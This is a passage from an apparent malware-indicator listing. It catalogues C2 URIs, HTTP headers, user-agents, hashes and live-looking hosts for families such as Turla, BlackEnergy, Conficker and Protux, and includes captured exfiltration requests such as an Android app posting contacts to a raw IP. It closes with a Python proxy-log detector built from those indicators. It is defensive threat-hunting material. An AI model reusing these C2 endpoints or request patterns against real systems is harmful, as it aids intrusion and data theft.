uri: 75 71 7a d6 75 8a 8e 92 8f 90 ce 8a 91 cd d6 c8  OR  uqz.u... ........
path2: uqz.u... ........
port: 60249
md5s: ace89709b1ca5db8462d238712ab2ee7
ref_url: http://www.arbornetworks.com/images/documents/White%20Papers%20and%20Research/WP_ASERT_EN.pdf

family: Cobra / Turla
method: POST
uri: /%s/%s?uid=%d&context=%s&mode=text&data=%s
md5s: 554450c1ecb925693fedbb9e56702646

family: Panda
method: POST
uri: /forum/login.cgi
path2: /login.cgi

family: Panda
method: POST
uri: /Photos/Query.cgi?loginid=
path2: Query.cgi?loginid=
ref_url: https://github.com/kbandla/APTnotes/blob/master/2014/AdversaryIntelligenceReport_DeepPanda_0%20(1).pdf

family: Aided Frame
method: GET
uri: /img/js.php
path2: /img/js.php
ref_url: https://github.com/kbandla/APTnotes/blob/master/2014/Aided_Frame_Aided_Direction.pdf

family: Scanbox watering hole framework
method: POST
uri: /i/recv.php
path2: /i/recv.php

family: Blackenergy DDoS Bot
method: GET
uri:
    /upgrade/f3395cd54cf857ddf8f2056768ff49ae/getcfg.php
    hxxps://46.165.222.28/upgrade/f3395cd54cf857ddf8f2056768ff49ae/getcfg.php
path2: /getcfg.php
ref_url: https://github.com/kbandla/APTnotes/blob/master/2014/BlackEnergy2_Plugins_Router.pdf

family: Syria Twitter.apk
method: POST
uri: /contacts
path2: /contacts
header:
    POST /contacts HTTP/1.1
    Content-Length: 43
    Content-Type: application/x-www-form-urlencoded
    Host: 80.241.223.128:4646
    Connection: Keep-Alive
    User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

    contact%26=null%26John+Rogers%26+2175566789
md5s: b91315805ef1df07bdbfa07d3a467424
ref_url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-behind-the-syria-conflict.pdf

family: TinyBaron / Miniduke / CosmicDuke
method: GET
uri:
    /modules/db/mgr.php?
    /modules/db/mgr.php?F=3?
path2: /modules/db/mgr.php?
md5s: 8e5106565fd96df1308d208d1e3426a3
    f22606385080d35551e7f8e8f49b7de9
ref_url: http://www.symantec.com/security_response/writeup.jsp?docid=2014-052717-4610-99

family: Moure
method: GET
uri:
    /db3Hv2VxYi1kZXhgc29tdWsDZGV6YXM=
    /HEQ5HoZ2LSxkZWFgc29tdWt9CxUKDgBPLBsfR0kzCxMGHG11ay5k
    /HUQ-EIdsIWdkcGdnLm9yZ2MyGxEEABRFJR4QDwM5GxUWEnRhbG9n
    /G1clBYJoKWYuZGZkcm90aWs8C14MChZSLhodAkIyRxYQFnJvdGlr
    /GFAmHZhsNmducy1vZXRmdWw_HB8YCh1TbwARHUsjBR4GHHBlbnMu
    /FkooHoZsNCxkZWtuYm9tb3J9CxUAABFPLAEGR0kzAR0XHG1vci5k
port: 80
md5s: 3a8715ca4dbc233e68e8063b5c76f0f7
    10002e607b1179593df21bd2825ccf17
ref_url: http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Moure-D/detailed-analysis.aspx
family: Vundo
method: GET
uri:
    /webhp
    /wpad.dat
path2:
    /webhp
    /wpad.dat
header:
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR
port: 80
md5s: 07c0824d98d7894882171ec40b633b30
ref_url: http://home.mcafee.com/VirusInfo/VirusProfile.aspx?key=4216306#none

family: Lostdoor RAT
uri: INFO||LostDoor-001|Remote PC||Windows XP Professional|<time>|511.56 MB|No|C:\WINDOWS\system32\cmd.exe|2:13:42
path2: |LostDoor-001

family: Protux worm
method: POST
uri:
    http://ruthless.hobby-site.com:80/PHqgHumeay5705.mp3
    http://202.71.136.14:80/ggBwkFNqDu1869.avi
    /newTroy.jpg
    http://Microsoft.dumb1.com:80/PHqgHumeay5705.mp3
path2:
    .mp3
    .rar
    .avi
    .jpg
header:
    POST http://ruising.webmailerservices.com:80/ggBwkFNqDu1869.avi HTTP/1.1
    User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
    Host: ruising.webmailerservices.com
    Content-Length: 42
    Proxy-Connection: keep-alive
    Pragma: no-cache
ua: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
port: 80
md5s: ce4733f42cb169f853abfd38b3ba2ffb
    123e186577d3b7deb3f338fa675f3e8a
ref_url: http://camas.comodo.com/cgi-bin/submit?file=2ed5823001b672a37cecdb01b74ebf3eedb59fb112a551efb4988998aa800ca5

family: Conficker / Kido worm
method: GET
uri: /
path2: ip checking services
header:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
    Host: www.getmyip.org
    Cache-Control: no-cache

    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
    Host: www.whatsmyipaddress.com
    Cache-Control: no-cache

    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
    Host: checkip.dyndns.org
    Cache-Control: no-cache
ua: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
port: 80
ref_url: http://mtc.sri.com/Conficker/

family: Dingu / Proxy
method: GET
uri:
    /1.jpg
    http://webemail.bounceme.net:8080/directget42.gif
path2:
    .jpg
    .gif
header:
    GET /1.jpg HTTP/1.1
    X-HOST: Remote PC@10.0.1.15
    User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0)
    Host: 11.36.214.181
    Connection: Keep-Alive
    Cache-Control: no-cache

    GET http://webemail.bounceme.net:8080/directget42.gif HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.1.3; Windows NT 5.0.3)
    Host: webemail.bounceme.net
    X-HOST: mr-computer@192.168.5.133
    Pragma: no-cache
ua: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0)
port: 80
md5s: CD19E4D5EC26C1DD72F39537750F0A60
    efa1add763eef93e8d759b090bfe518e
ref_url: http://safezonecast.lgcns.com/Common/MenaceInfo/pop.MenaceInfo.jsp?code=SZ1301-0001NS
    http://telussecuritylabs.com/threats/show/TSL20130115-05
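The practical use of the path2 and ua columns in this table is as proxy-log indicators, and the rows also show why they must be combined: "Mozilla/4.0" alone (Andromeda) or a visit to checkip.dyndns.org alone (Conficker) is not a detection, while "/classes/functions.php?functionname=" or "&pin=" followed by 16 hex digits is specific enough on its own. The Python below is an added example written for this listing, not code from any of the cited sources; the rules are my own reading of a handful of rows (the hex-length anchors are inferred from the samples, not stated on the page), the log format and the benign lines are constructed, and the malicious hosts and paths are taken from the table.

```python
import re
from typing import Any, Dict, List
from urllib.parse import urlsplit

# Indicator rules distilled from the path2 / ua / host columns of the rows above.
# "path" is searched in path+query, "ua" must equal the whole User-Agent, "hosts"
# restricts the rule to those Host values, "method" to that verb. Every component
# a rule carries must match, which is how a generic UA such as "Mozilla/4.0" or an
# IP-check host is kept from firing on its own.
RULES: List[Dict[str, Any]] = [
    {"family": "Andromeda / Wauchos", "path": re.compile(r"/gate\.php(\?|$)"), "ua": "Mozilla/4.0"},
    {"family": "Twerkin", "path": re.compile(r"/classes/functions\.php\?functionname=")},
    {"family": "Quervar / Induc.C / Dorifel", "path": re.compile(r"&pin=[0-9A-F]{16}$")},
    {"family": "Alurewo / Poweliks click-fraud", "path": re.compile(r"/click\.php\?c=[0-9a-f]{20,}$")},
    {"family": "Zeus Gameover", "path": re.compile(r"/search\.php\?page=[0-9a-f]{16}$")},
    {"family": "Lagulon (Operation Cleaver)", "method": "POST", "path": re.compile(r"/server\.php$"), "ua": "Mozilla/5.0"},
    {"family": "TzeeBot / TinyZBot", "method": "POST", "path": re.compile(r"/checkupdate\.asmx$")},
    {"family": "Conficker / Kido", "hosts": {"www.getmyip.org", "www.whatsmyipaddress.com", "checkip.dyndns.org"},
     "ua": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"},
]

# Constructed proxy log, tab-separated: timestamp, client, method, URL, quoted User-Agent.
# Hosts and paths on the malicious lines come from the listing; the others are made up.
SAMPLE_LOG = "\n".join("\t".join(f) for f in [
    ("2014-12-26T10:01:02Z", "10.0.0.5", "POST", "http://ddnsse3ravis221.com.ua/and/gate.php", '"Mozilla/4.0"'),
    ("2014-12-26T10:01:05Z", "10.0.0.7", "GET", "http://nettwerk.x10.mx/classes/functions.php?functionname=getcommand", '""'),
    ("2014-12-26T10:01:09Z", "10.0.0.8", "GET", "http://intranet.example/gate.php?x=1",
     '"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36"'),
    ("2014-12-26T10:01:11Z", "10.0.0.9", "GET", "http://greatnewidea1.ru/1.php?JXU9WXFG&pin=DEC09603F4CEFD80",
     '"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0)"'),
    ("2014-12-26T10:01:15Z", "10.0.0.4", "GET", "http://www.getmyip.org/",
     '"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"'),
    ("2014-12-26T10:01:20Z", "10.0.0.6", "GET", "http://checkip.dyndns.org/",
     '"Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"'),
])

LOG_RE = re.compile(r'^(?P<ts>\S+)\t(?P<src>\S+)\t(?P<method>[A-Z]+)\t(?P<url>\S+)\t"(?P<ua>[^"]*)"$')


def scan(log_text: str) -> List[Dict[str, Any]]:
    """Return one hit per (line, rule) whose every component matched."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue                      # malformed line: skip it, do not abort the scan
        parts = urlsplit(m.group("url"))
        path_query = parts.path + ("?" + parts.query if parts.query else "")
        for rule in RULES:
            if "method" in rule and rule["method"] != m.group("method"):
                continue
            if "hosts" in rule and parts.hostname not in rule["hosts"]:
                continue
            if "path" in rule and not rule["path"].search(path_query):
                continue
            if "ua" in rule and rule["ua"] != m.group("ua"):
                continue
            hits.append({"line": lineno, "src": m.group("src"), "host": parts.hostname, "family": rule["family"]})
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"line {h['line']}: {h['src']} -> {h['host']}  [{h['family']}]")
```

Lines 3 and 6 of the sample are the two false-positive traps: a /gate.php on an internal host with a modern browser UA, and a user checking their own IP with Firefox. Neither fires, because the Andromeda rule also demands the bare "Mozilla/4.0" UA and the Conficker rule demands the worm's exact UA string. When you lift indicators from this table into a real rule set, keep that pairing; a lone path2 value such as /click.php?c= or /gate.php will match far more than malware.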